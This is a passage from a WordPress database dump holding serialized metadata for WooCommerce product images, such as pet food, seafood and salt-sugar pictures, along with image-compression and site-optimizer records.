:3:\"end\";i:1591599285;}}'),(270,229,'siteground_optimizer_optimization_attempts','1'),(271,229,'siteground_optimizer_is_optimized','1'),(272,229,'siteground_optimizer_webp_conversion_attempts','1'),(273,229,'siteground_optimizer_webp_conversion_failed','1'),(275,231,'_wp_attached_file','2020/06/pet-food.png'),(276,231,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:20:\"2020/06/pet-food.png\";s:8:\"filesize\";i:56274;s:5:\"sizes\";a:3:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:20:\"pet-food-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:58126;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:20:\"pet-food-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:7826;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:18:\"pet-food-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2498;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(277,231,'tiny_compress_images','a:8:{i:0;a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:196935;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:56274;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:5:\"ratio\";d:0.28570000000000001;}s:3:\"end\";i:1591599276;}s:6:\"medium\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:53158;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:17314;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:5:\"ratio\";d:0.32569999999999999;}s:3:\"end\";i:1594122750;}s:9:\"thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:15670;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:5771;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:5:\"ratio\";d:0.36830000000000002;}s:3:\"end\";i:1594122747;}s:21:\"woocommerce_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:59068;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:19075;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:5:\"ratio\";d:0.32290000000000002;}s:3:\"end\";i:1594122753;}s:29:\"woocommerce_gallery_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:7787;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:3341;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:5:\"ratio\";d:0.42899999999999999;}s:3:\"end\";i:1594122756;}s:12:\"shop_catalog\";a:0:{}s:14:\"shop_thumbnail\";a:0:{}s:21:\"yith-woocompare-image\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:30944;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:10260;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:220;s:6:\"height\";i:154;s:5:\"ratio\";d:0.33160000000000001;}s:3:\"end\";i:1591599285;}}'),(278,231,'siteground_optimizer_optimization_attempts','1'),(279,231,'siteground_optimizer_is_optimized','1'),(280,231,'siteground_optimizer_webp_conversion_attempts','1'),(281,231,'siteground_optimizer_webp_conversion_failed','1'),(283,233,'_wp_attached_file','2020/06/pet-shampoo.png'),(284,233,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:23:\"2020/06/pet-shampoo.png\";s:8:\"filesize\";i:37089;s:5:\"sizes\";a:3:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:23:\"pet-shampoo-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:36610;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:23:\"pet-shampoo-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4553;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:21:\"pet-shampoo-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1520;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(285,233,'tiny_compress_images','a:8:{i:0;a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:130192;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:37089;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:5:\"ratio\";d:0.28489999999999999;}s:3:\"end\";i:1591599274;}s:6:\"medium\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:32960;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:11298;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:5:\"ratio\";d:0.34279999999999999;}s:3:\"end\";i:1594122749;}s:9:\"thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:9194;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:3874;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:5:\"ratio\";d:0.4214;}s:3:\"end\";i:1594122746;}s:21:\"woocommerce_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:36829;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:12434;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:5:\"ratio\";d:0.33760000000000001;}s:3:\"end\";i:1594122752;}s:29:\"woocommerce_gallery_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:4473;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:2320;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:5:\"ratio\";d:0.51870000000000005;}s:3:\"end\";i:1594122754;}s:12:\"shop_catalog\";a:0:{}s:14:\"shop_thumbnail\";a:0:{}s:21:\"yith-woocompare-image\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:19078;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:6682;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:220;s:6:\"height\";i:154;s:5:\"ratio\";d:0.35020000000000001;}s:3:\"end\";i:1591599283;}}'),(286,233,'siteground_optimizer_optimization_attempts','1'),(287,233,'siteground_optimizer_is_optimized','1'),(288,233,'siteground_optimizer_webp_conversion_attempts','1'),(289,233,'siteground_optimizer_webp_conversion_failed','1'),(291,236,'_wp_attached_file','2020/06/meat.png'),(292,236,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:16:\"2020/06/meat.png\";s:8:\"filesize\";i:87691;s:5:\"sizes\";a:3:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:16:\"meat-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:75312;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:16:\"meat-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:8672;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:14:\"meat-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2672;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(293,236,'tiny_compress_images','a:8:{i:0;a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:282750;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:87691;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:5:\"ratio\";d:0.31009999999999999;}s:3:\"end\";i:1591599275;}s:6:\"medium\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:70667;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:24749;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:5:\"ratio\";d:0.35020000000000001;}s:3:\"end\";i:1594122748;}s:9:\"thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:18736;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:7389;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:5:\"ratio\";d:0.39439999999999997;}s:3:\"end\";i:1594122745;}s:21:\"woocommerce_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:78125;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:27346;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:5:\"ratio\";d:0.34999999999999998;}s:3:\"end\";i:1594122751;}s:29:\"woocommerce_gallery_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:8764;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:3979;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:5:\"ratio\";d:0.45400000000000001;}s:3:\"end\";i:1594122754;}s:12:\"shop_catalog\";a:0:{}s:14:\"shop_thumbnail\";a:0:{}s:21:\"yith-woocompare-image\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:38616;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:13863;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:220;s:6:\"height\";i:154;s:5:\"ratio\";d:0.35899999999999999;}s:3:\"end\";i:1591599284;}}'),(294,236,'siteground_optimizer_optimization_attempts','1'),(295,236,'siteground_optimizer_is_optimized','1'),(296,236,'siteground_optimizer_webp_conversion_attempts','1'),(297,236,'siteground_optimizer_webp_conversion_failed','1'),(298,238,'_wp_attached_file','2020/06/salt-sugar.png'),(299,238,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:22:\"2020/06/salt-sugar.png\";s:8:\"filesize\";i:60345;s:5:\"sizes\";a:3:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:22:\"salt-sugar-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:58477;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:22:\"salt-sugar-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:7533;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:20:\"salt-sugar-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2551;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(300,238,'tiny_compress_images','a:8:{i:0;a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:197991;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:60345;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:5:\"ratio\";d:0.30480000000000002;}s:3:\"end\";i:1591599256;}s:6:\"medium\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:53906;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:19354;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:5:\"ratio\";d:0.35899999999999999;}s:3:\"end\";i:1594122744;}s:9:\"thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:15450;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:6211;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:5:\"ratio\";d:0.40200000000000002;}s:3:\"end\";i:1594122741;}s:21:\"woocommerce_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:60057;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:20893;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:5:\"ratio\";d:0.34789999999999999;}s:3:\"end\";i:1594122747;}s:29:\"woocommerce_gallery_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:7564;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:3593;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:5:\"ratio\";d:0.47499999999999998;}s:3:\"end\";i:1594122749;}s:12:\"shop_catalog\";a:0:{}s:14:\"shop_thumbnail\";a:0:{}s:21:\"yith-woocompare-image\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:31318;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:11232;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:220;s:6:\"height\";i:154;s:5:\"ratio\";d:0.35859999999999997;}s:3:\"end\";i:1591599265;}}'),(301,238,'siteground_optimizer_optimization_attempts','1'),(302,238,'siteground_optimizer_is_optimized','1'),(303,238,'siteground_optimizer_webp_conversion_attempts','1'),(304,238,'siteground_optimizer_webp_conversion_failed','1'),(305,239,'_wp_attached_file','2020/06/seafood.png'),(306,239,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:19:\"2020/06/seafood.png\";s:8:\"filesize\";i:103693;s:5:\"sizes\";a:3:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:19:\"seafood-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:107001;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:19:\"seafood-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:12872;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:17:\"seafood-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3856;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(307,239,'tiny_compress_images','a:8:{i:0;a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:382487;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:103693;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:5:\"ratio\";d:0.27110000000000001;}s:3:\"end\";i:1591599256;}s:6:\"medium\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:97944;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:31198;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:5:\"ratio\";d:0.31850000000000001;}s:3:\"end\";i:1594122737;}s:9:\"thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:27347;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:9506;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:5:\"ratio\";d:0.34760000000000002;}s:3:\"end\";i:1594122734;}s:21:\"woocommerce_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:109280;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:34963;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:5:\"ratio\";d:0.31990000000000002;}s:3:\"end\";i:1594122741;}s:29:\"woocommerce_gallery_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:12922;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:4930;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:5:\"ratio\";d:0.38150000000000001;}s:3:\"end\";i:1594122743;}s:12:\"shop_catalog\";a:0:{}s:14:\"shop_thumbnail\";a:0:{}s:21:\"yith-woocompare-image\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:55333;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:17847;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:220;s:6:\"height\";i:154;s:5:\"ratio\";d:0.32250000000000001;}s:3:\"end\";i:1591599266;}}'),(308,239,'siteground_optimizer_optimization_attempts','1'),(309,239,'siteground_optimizer_is_optimized','1'),(310,239,'siteground_optimizer_webp_conversion_attempts','1'),(311,239,'siteground_optimizer_webp_conversion_failed','1'),(312,346,'_wp_attached_file','2020/06/post1.jpg'),(313,346,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:900;s:6:\"height\";i:600;s:4:\"file\";s:17:\"2020/06/post1.jpg\";s:8:\"filesize\";i:46325;s:5:\"sizes\";a:3:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:17:\"post1-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17284;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:17:\"post1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3226;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:15:\"post1-50x33.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:33;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:978;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(314,346,'_wp_attachment_image_alt','post1'),(315,346,'tiny_compress_images','a:11:{i:0;a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:46785;s:4:\"type\";s:10:\"image/jpeg\";}s:6:\"output\";a:5:{s:4:\"size\";i:46325;s:4:\"type\";s:10:\"image/jpeg\";s:5:\"width\";i:900;s:6:\"height\";i:600;s:5:\"ratio\";d:0.99019999999999997;}s:3:\"end\";i:1591599228;}s:6:\"medium\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:12557;s:4:\"type\";s:10:\"image/jpeg\";}s:6:\"output\";a:5:{s:4:\"size\";i:12557;s:4:\"type\";s:10:\"image/jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:5:\"ratio\";d:1;}s:3:\"end\";i:1594122717;}s:9:\"thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:6337;s:4:\"type\";s:10:\"image/jpeg\";}s:6:\"output\";a:5:{s:4:\"size\";i:6337;s:4:\"type\";s:10:\"image/jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:5:\"ratio\";d:1;}s:3:\"end\";i:1594122714;}s:12:\"medium_large\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:49850;s:4:\"type\";s:10:\"image/jpeg\";}s:6:\"output\";a:5:{s:4:\"size\";i:40036;s:4:\"type\";s:10:\"image/jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:5:\"ratio\";d:0.80310000000000004;}s:3:\"end\";i:1594122720;}s:21:\"woocommerce_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:17852;s:4:\"type\";s:10:\"image/jpeg\";}s:6:\"output\";a:5:{s:4:\"size\";i:17852;s:4:\"type\";s:10:\"image/jpeg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:5:\"ratio\";d:1;}s:3:\"end\";i:1594122723;}s:18:\"woocommerce_single\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:34747;s:4:\"type\";s:10:\"image/jpeg\";}s:6:\"output\";a:5:{s:4:\"size\";i:27831;s:4:\"type\";s:10:\"image/jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:5:\"ratio\";d:0.80100000000000005;}s:3:\"end\";i:1594122727;}s:29:\"woocommerce_gallery_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:3564;s:4:\"type\";s:10:\"image/jpeg\";}s:6:\"output\";a:5:{s:4:\"size\";i:3564;s:4:\"type\";s:10:\"image/jpeg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:5:\"ratio\";d:1;}s:3:\"end\";i:1594122730;}s:12:\"shop_catalog\";a:0:{}s:11:\"shop_single\";a:0:{}s:14:\"shop_thumbnail\";a:0:{}s:21:\"yith-woocompare-image\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:8346;s:4:\"type\";s:10:\"image/jpeg\";}s:6:\"output\";a:5:{s:4:\"size\";i:8346;s:4:\"type\";s:10:\"image/jpeg\";s:5:\"width\";i:220;s:6:\"height\";i:154;s:5:\"ratio\";d:1;}s:3:\"end\";i:1591599240;}}'),(316,346,'siteground_optimizer_optimization_attempts','1'),(317,346,'siteground_optimizer_is_optimized','1'),(318,346,'siteground_optimizer_webp_conversion_attempts','1'),(319,346,'siteground_optimizer_webp_conversion_failed','1'),(321,348,'_wp_attached_file','2020/06/post22.jpg'),(322,348,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:900;s:6:\"height\";i:600;s:4:\"file\";s:18:\"2020/06/post22.jpg\";s:8:\"filesize\";i:76317;s:5:\"sizes\";a:3:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:18:\"post22-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30686;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:18:\"post22-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3654;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:16:\"post22-50x33.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:33;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:942;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(323,348,'tiny_compress_images','a:11:{i:0;a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:77980;s:4:\"type\";s:10:\"image/jpeg\";}s:6:\"output\";a:5:{s:4:\"size\";i:76317;s:4:\"type\";s:10:\"image/jpeg\";s:5:\"width\";i:900;s:6:\"height\";i:600;s:5:\"ratio\";d:0.97870000000000001;}s:3:\"end\";i:1591599228;}s:6:\"medium\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:18073;s:4:\"type\";s:10:\"image/jpeg\";}s:6:\"output\";a:5:{s:4:\"size\";i:17763;s:4:\"type\";s:10:\"image/jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:5:\"ratio\";d:0.98280000000000001;}s:3:\"end\";i:1594122716;}s:9:\"thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:7586;s:4:\"type\";s:10:\"image/jpeg\";}s:6:\"output\";a:5:{s:4:\"size\";i:7572;s:4:\"type\";s:10:\"image/jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:5:\"ratio\";d:0.99819999999999998;}s:3:\"end\";i:1594122713;}s:12:\"medium_large\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:101103;s:4:\"type\";s:10:\"image/jpeg\";}s:6:\"output\";a:5:{s:4:\"size\";i:92370;s:4:\"type\";s:10:\"image/jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:5:\"ratio\";d:0.91359999999999997;}s:3:\"end\";i:1594122721;}s:21:\"woocommerce_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:29830;s:4:\"type\";s:10:\"image/jpeg\";}s:6:\"output\";a:5:{s:4:\"size\";i:29403;s:4:\"type\";s:10:\"image/jpeg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:5:\"ratio\";d:0.98570000000000002;}s:3:\"end\";i:1594122724;}s:18:\"woocommerce_single\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:67302;s:4:\"type\";s:10:\"image/jpeg\";}s:6:\"output\";a:5:{s:4:\"size\";i:60849;s:4:\"type\";s:10:\"image/jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:5:\"ratio\";d:0.90410000000000001;}s:3:\"end\";i:1594122728;}s:29:\"woocommerce_gallery_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:3731;s:4:\"type\";s:10:\"image/jpeg\";}s:6:\"output\";a:5:{s:4:\"size\";i:3693;s:4:\"type\";s:10:\"image/jpeg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:5:\"ratio\";d:0.98980000000000001;}s:3:\"end\";i:1594122730;}s:12:\"shop_catalog\";a:0:{}s:11:\"shop_single\";a:0:{}s:14:\"shop_thumbnail\";a:0:{}s:21:\"yith-woocompare-image\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:10408;s:4:\"type\";s:10:\"image/jpeg\";}s:6:\"output\";a:5:{s:4:\"size\";i:10042;s:4:\"type\";s:10:\"image/jpeg\";s:5:\"w